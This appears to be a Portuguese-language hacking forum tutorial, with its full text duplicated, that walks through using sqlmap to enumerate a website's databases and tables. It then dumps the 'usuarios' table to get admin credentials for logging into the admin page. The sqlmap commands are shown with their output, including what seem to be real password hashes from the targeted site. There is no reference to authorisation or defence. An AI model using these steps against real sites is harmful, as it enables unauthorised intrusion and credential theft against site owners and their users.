- Boa noite Galera , tutorial pequeno .Mas bem pratico
-
root@bt:/pentest/database/sqlmap#
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u [Tens de ter uma conta e sessão iniciada para poderes visualizar este link] --dbs
depois desse comando vai mostrar todas as databases existentes . Segue o Exemplo
available databases [2]:
[*] information_schema
[*] databaseinformações
Depois que soubermos o nome da database . Vamos ao seguinte comando ...
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u [Tens de ter uma conta e sessão iniciada para poderes visualizar este link] -D databaseinformações --tables
Com este comando o sqlmap ira listar todas as tabelas dentro da database especificada no caso databaseinformações
segue o exemplo...
Database: databasinformações
[17 tables]
+-----------------------+
| `categoria-downloads` |
| `categoria-noticias` |
| agendas |
| banners |
| categorias |
| diretorios |
| downloads |
| fotos |
| fotos_noticias |
| galerias |
| membro_noticia |
| membros |
| namidia |
| noticias |
| press |
| usuarios |
| videos |
+-----------------------+
Qual tabela contem os arquivos que é de nosso interesse para podemos efetuar um login na pagina de admin ? USUARIOS ...
usaremos agora
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u [Tens de ter uma conta e sessão iniciada para poderes visualizar este link] -D databaseinformações -T usuarios --dump
com o comando --dump , o SQLMAP ira nos mostrar todas as informações que contem dentro da tabelas usuarios
segue o exemplo ...
+----+------+------+---------------------+------+------+------+------+------+------+------+----------------------------------+-------+-------+-------+----------+
| id | per9 | per5 | nome | per4 | per3 | per2 | per1 | per7 | per8 | per6 | senha | per12 | per11 | per10 | login |
+----+------+------+---------------------+------+------+------+------+------+------+------+----------------------------------+-------+-------+-------+----------+
| 1 | 1 | 1 | Administrador | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 54d0fc007ec9a2478249f97d1a6ea793 | 1 | 1 | 1 | admin |
| 2 | 0 | 0 | xxxxxxxxxxxxx | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 74e4fe4936a69406effe6add85278531 | 0 | 0 | 0 | xxxxxx |
| 3 | 0 | 0 | xxxxxxxxxxxxx | 0 | 0 | 0 | 0 | 0 | 0 | 0 | da96001f09f3728495e49e27b725ba45 | 0 | 0 | 0 | xxxxxxx |
| 4 | 0 | 0 | xxxxxxxx | 0 | 0 | 0 | 0 | 0 | 0 | 0 | da96001f09f3728495e49e27b725ba45 | 0 | 0 | 0 | xxxxx |
| 5 | 0 | 0 | xxxxxx | 0 | 0 | 0 | 0 | 0 | 0 | 0 | d48ac0343f39bf54095c7cf8439617c9 | 0 | 0 | 0 | xxxxxx |
+----+------+------+---------------------+------+------+------+------+------+------+------+----------------------------------+-------+-------+-------+----------+
-
E isso ai ! + ?
-
root@bt:/pentest/database/sqlmap#
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u [Tens de ter uma conta e sessão iniciada para poderes visualizar este link] --dbs
depois desse comando vai mostrar todas as databases existentes . Segue o Exemplo
available databases [2]:
[*] information_schema
[*] databaseinformações
Depois que soubermos o nome da database . Vamos ao seguinte comando ...
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u [Tens de ter uma conta e sessão iniciada para poderes visualizar este link] -D databaseinformações --tables
Com este comando o sqlmap ira listar todas as tabelas dentro da database especificada no caso databaseinformações
segue o exemplo...
Database: databasinformações
[17 tables]
+-----------------------+
| `categoria-downloads` |
| `categoria-noticias` |
| agendas |
| banners |
| categorias |
| diretorios |
| downloads |
| fotos |
| fotos_noticias |
| galerias |
| membro_noticia |
| membros |
| namidia |
| noticias |
| press |
| usuarios |
| videos |
+-----------------------+
Qual tabela contem os arquivos que é de nosso interesse para podemos efetuar um login na pagina de admin ? USUARIOS ...
usaremos agora
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u [Tens de ter uma conta e sessão iniciada para poderes visualizar este link] -D databaseinformações -T usuarios --dump
com o comando --dump , o SQLMAP ira nos mostrar todas as informações que contem dentro da tabelas usuarios
segue o exemplo ...
+----+------+------+---------------------+------+------+------+------+------+------+------+----------------------------------+-------+-------+-------+----------+
| id | per9 | per5 | nome | per4 | per3 | per2 | per1 | per7 | per8 | per6 | senha | per12 | per11 | per10 | login |
+----+------+------+---------------------+------+------+------+------+------+------+------+----------------------------------+-------+-------+-------+----------+
| 1 | 1 | 1 | Administrador | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 54d0fc007ec9a2478249f97d1a6ea793 | 1 | 1 | 1 | admin |
| 2 | 0 | 0 | xxxxxxxxxxxxx | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 74e4fe4936a69406effe6add85278531 | 0 | 0 | 0 | xxxxxx |
| 3 | 0 | 0 | xxxxxxxxxxxxx | 0 | 0 | 0 | 0 | 0 | 0 | 0 | da96001f09f3728495e49e27b725ba45 | 0 | 0 | 0 | xxxxxxx |
| 4 | 0 | 0 | xxxxxxxx | 0 | 0 | 0 | 0 | 0 | 0 | 0 | da96001f09f3728495e49e27b725ba45 | 0 | 0 | 0 | xxxxx |
| 5 | 0 | 0 | xxxxxx | 0 | 0 | 0 | 0 | 0 | 0 | 0 | d48ac0343f39bf54095c7cf8439617c9 | 0 | 0 | 0 | xxxxxx |
+----+------+------+---------------------+------+------+------+------+------+------+------+----------------------------------+-------+-------+-------+----------+
-
E isso ai ! + ?